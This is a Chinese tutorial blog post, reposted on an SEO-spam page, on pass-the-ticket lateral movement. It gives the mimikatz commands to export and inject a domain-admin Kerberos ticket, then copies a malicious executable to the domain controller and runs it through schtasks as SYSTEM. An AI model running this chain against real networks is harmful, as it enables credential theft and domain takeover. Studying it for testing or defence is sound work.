当前位置: 首页 > news >正文

中铁建设集团华东分公司网站合肥建站公司seo

中铁建设集团华东分公司网站,合肥建站公司seo,wordpress4.7.2写文章,做名片网站系列文章第一章节之基础知识篇 内网渗透(一)之基础知识-内网渗透介绍和概述 内网渗透(二)之基础知识-工作组介绍 内网渗透(三)之基础知识-域环境的介绍和优点 内网渗透(四)之基础知识-搭建域环境 内网渗透(五)之基础知识-Active Directory活动目录介绍和使用 内网渗透(六)之基…

系列文章第一章节之基础知识篇

内网渗透(一)之基础知识-内网渗透介绍和概述
内网渗透(二)之基础知识-工作组介绍
内网渗透(三)之基础知识-域环境的介绍和优点
内网渗透(四)之基础知识-搭建域环境
内网渗透(五)之基础知识-Active Directory活动目录介绍和使用
内网渗透(六)之基础知识-域中的权限划分和基本思想
内网渗透(七)之基础知识-企业常见安全域划分和结构
内网渗透(八)之基础知识-企业域中计算机分类和专业名

系列文章第二章节之内网信息收集篇

内网渗透(九)之内网信息收集-手动本地信息收集
内网渗透(十)之内网信息收集-编写自动化脚本收集本地信息
内网渗透(十一)之内网信息收集-内网IP扫描和发现
内网渗透(十二)之内网信息收集-内网端口扫描和发现
内网渗透(十三)之内网信息收集-收集域环境中的基本信息
内网渗透(十四)之内网信息收集-域环境中查找域内用户基本信息
内网渗透(十五)之内网信息收集-域环境中定位域管理员
内网渗透(十六)之内网信息收集-powershell基础知识
内网渗透(十七)之内网信息收集-powershell收集域内信息和敏感数据定位

系列文章第三章节之Windows协议认证和密码抓取篇

内网渗透(十八)之Windows协议认证和密码抓取-本地认证(NTML哈希和LM哈希)
内网渗透(十九)之Windows协议认证和密码抓取-网络认证(基于挑战响应认证的NTLM协议)
内网渗透(二十)之Windows协议认证和密码抓取-域认证(Kerberos协议)
内网渗透(二十一)之Windows协议认证和密码抓取-Golden Ticket黄金票据制作原理及利用方式
内网渗透(二十二)之Windows协议认证和密码抓取-Silver Ticket白银票据制作原理及利用方式
内网渗透(二十三)之Windows协议认证和密码抓取-Mimikatz介绍和各种模块使用方法
内网渗透(二十四)之Windows协议认证和密码抓取-Mimikatz读取sam和lsass获取密码
内网渗透(二十五)之Windows协议认证和密码抓取-使用Hashcat和在线工具破解NTLM Hash
内网渗透(二十六)之Windows协议认证和密码抓取-浏览器、数据库等其他密码的抓取
内网渗透(二十七)之Windows协议认证和密码抓取-Windows其他类型抓取NTLM HASH工具
内网渗透(二十八)之Windows协议认证和密码抓取-Windows RDP凭证的抓取和密码破解
内网渗透(二十九)之Windows协议认证和密码抓取-Windows-2012R2之后抓取密码的方式和抓取密码的防范措施

系列文章第四章节之横向移动篇

内网渗透(三十)之横向移动篇-利用远控工具向日葵横向移动
内网渗透(三十一)之横向移动篇-利用远控工具todesk横向移动
内网渗透(三十二)之横向移动篇-利用远控工具GoToHTTP横向移动
内网渗透(三十三)之横向移动篇-利用远控工具RustDESK横向移动
内网渗透(三十四)之横向移动篇-IPC配合计划任务横向移动
内网渗透(三十五)之横向移动篇-IPC配合系统服务横向移动
内网渗透(三十六)之横向移动篇-Password Spraying密码喷洒攻击和域内用户枚举横向移动
内网渗透(三十七)之横向移动篇-Pass the Hash 哈希传递攻击(PTH)横向移动
内网渗透(三十八)之横向移动篇-pass the key 密钥传递攻击(PTK)横向攻击

注:阅读本编文章前,请先阅读系列文章,以免造成看不懂的情况!

pass the ticket 票据传递攻击(PTT)横向攻击

票据传递介绍

要想使用mimikatz的哈希传递功能,必须具有本地管理员权限。 mimikatz同样提供了不需要本地管理员权限进行横向渗透测试的方法

例如票据传递( PassThe Ticket,PTT)

票据传递是基于kerberos认证的一种攻击方式,常用来做后渗透权限维持。

黄金票据攻击利用的前提是得到了域内krbtgt用户的NTLM哈希或AES-256的值。

白银票据攻击利用的前提是得到了域内服务账号的HTML哈希或AES-256的值。

票据传递攻击一般分为两种

1、自己制作票据
2、传递内存中的票据

实验复现

实验环境

机器名登录用户IP
Windows server 2012(域控)administrator(域管理员)192.168.41.10
windows server 2012-2(域内主机)administrator(本地管理员)192.168.41.15

首先我们通过木马或者钓鱼等各种方法拿下windows server 2012-2主机的权限

在这里插入图片描述

然后我们导出机器内存中的票据

mimikatz sekurlsa::tickets /export

在这里插入图片描述
执行以上命令后,会在当前目录下出现多个服务的票据文件,例如krbtgt、cifs、ldap等。

在这里插入图片描述

我们很幸运的导出了一张域管理员用户的高权限票据

清除内存中的票据

shell klist purge
mimikatz kerberos::purge
//两个都是清除票据

在这里插入图片描述

将高权限的票据文件注入内存

mimikatz kerberos::ptt [0;24a93]-2-0-40e10000-Administrator@krbtgt-HACK.COM.kirbi

在这里插入图片描述

查看票据

shell klist
mimikatz kerberos::tgt
//两个都是查看票据

在这里插入图片描述
访问机器

dir \\dc.hack.com\C$

在这里插入图片描述

现在由于我们有了域管理员权限的高权限票据,导致可以让我们访问域控了,接下来就是利用IPC配合计划任务上线域控了

在这里插入图片描述

这个artifact.exe就是我们要拷贝的恶意程序,他被我们放置在Windows 2012-2主机上

拷贝恶意程序到域控上

copy artifact.exe \\dc.hack.com\C$

在这里插入图片描述

schtasks命令创建计划任务:

schtasks /create /s IP地址 /tn 计划任务名 /sc onstart /tr c:\文件 /ru system /f

在这里插入图片描述

schtasks命令执行计划任务:

schtasks /run /s IP地址 /i /tn "计划任务名"

在这里插入图片描述

目标机器域控成功上线

在这里插入图片描述

http://www.15wanjia.com/news/5718.html

相关文章:

  • 行政还要负责网站建设新媒体吗如何在网上推广
  • 南京网站推广百度推广账号登陆入口
  • 昆明网站排名优化费用就业培训机构有哪些
  • 无极磁铁网站淘宝关键词搜索排名
  • 我买了一个域名怎么做网站创网站永久免费建站
  • 成都家具企业网站建设知乎营销平台
  • 一个网站怎么做聚合网络推广员工资多少钱
  • 烟台seo网站推广费用厦门百度推广怎么做
  • 在家做网站设计挣钱吗如何用手机制作网站
  • 广宁网站建设西安网站外包
  • 深圳做积分商城网站公司免费投放广告的平台
  • 广州网站建设studstu百度关键词搜索怎么收费
  • 婚介网站建设百度竞价托管靠谱吗
  • 大丰做网站班级优化大师功能介绍
  • 青岛网站搭建关键词快速排名怎么做
  • 手机画平面图软件优化大师怎么删除学生
  • 长春网站seo好找工作吗
  • 网站规划的内容营销型网站外包
  • 网站怎么更换域名个人网站模板免费下载
  • 那种网站后台最好企业网络的组网方案
  • 公司网站设计要求最新疫情消息
  • 系网站建设总结报告百度怎么投放自己的广告
  • 厦门企业建站模板关键词排名优化如何
  • 邢台做网站价位河南推广网站
  • 企业建网站的目的怎么网站推广
  • 做医院网站长尾词seo排名
  • 营销型网站建设公司推荐北京seo服务销售
  • 二进制可以做网站是吗含有友情链接的网页
  • 国外 配色网站杭州百度快照优化排名
  • 怎样做好网络推广呀宁波企业seo外包